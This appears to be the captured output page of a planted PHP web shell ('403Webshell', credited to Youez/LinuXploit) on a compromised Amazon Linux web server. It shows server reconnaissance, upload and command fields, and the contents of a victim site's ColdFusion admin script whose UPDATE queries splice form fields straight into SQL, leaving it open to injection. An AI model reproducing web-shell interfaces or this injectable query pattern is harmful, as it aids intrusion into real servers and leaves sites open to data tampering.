403Webshell
Server IP : 172.67.201.108  /  Your IP : 216.73.216.11
Web Server : Apache/2.4.68 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-69-123.ec2.internal 6.1.176-223.369.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jul 24 13:34:27 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/home2/cgny/nympadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/home2/cgny/nympadmin/editbestbetcategory22011.cfm
<Cfif parameterexists(form.photo) and #form.photo# is not ''>

		<cfset imagepath="/home/home2/domains/parentsknow.com/public_html/regionalhomepages/">
  <cffile action="upload"
accept="image/jpeg,image/pjpeg"
	      nameconflict="makeunique"
			  filefield="photo"
			  destination="#imagepath#">

	<cfset photo = "#File.ServerFile#">
  <cfset photo = replace(photo," ","_","ALL")>


 <cffile
   action = "rename"
   source = "#imagepath#/#File.ServerFile#"
   destination = "#imagepath#/#photo#"
   mode = "644">

<CFQUERY datasource="#ds#">
	UPDATE ParentsListingsCatMain2011 SET 
	catname = '#form.name#',
	shortname = '#form.shortname#',
	catnamealias = '#form.catnamealias#',
	catdescription = '#form.catdescription#',
	defaultimage = 'http://www.nymetroparents.com/regionalhomepages/#photo#',
	rocklanddescription = '#form.rocklanddescription#',
	regionaldescription = '#form.regionaldescription#',

	mastercat = #form.mastercat#,
	articlecategory = #form.articlecategory#,
	ignoreregions = #form.ignoreregions#,
	enhancedlisting = '#form.copyedit#',
		newnympsub = '#form.newnympsub#',

	hide = #form.hide#
	WHERE id = #form.id#
	</CFQUERY>
	
	
<cfelse>


<CFQUERY datasource="#ds#">
	UPDATE ParentsListingsCatMain2011 SET 
	catname = '#form.name#',
	shortname = '#form.shortname#',
	catdescription = '#form.catdescription#',
	mastercat = #form.mastercat#,
			newnympsub = '#form.newnympsub#',
				rocklanddescription = '#form.rocklanddescription#',
	regionaldescription = '#form.regionaldescription#',

	ignoreregions = #form.ignoreregions#,
	articlecategory = #form.articlecategory#,

	enhancedlisting = '#form.copyedit#',
	hide = #form.hide#
	WHERE id = #form.id#
	</CFQUERY>
	

</Cfif>
	


<cflocation url="addbestbetcategory2011.cfm" addtoken="no">		

Youez - 2016 - github.com/yon3zu
LinuXploit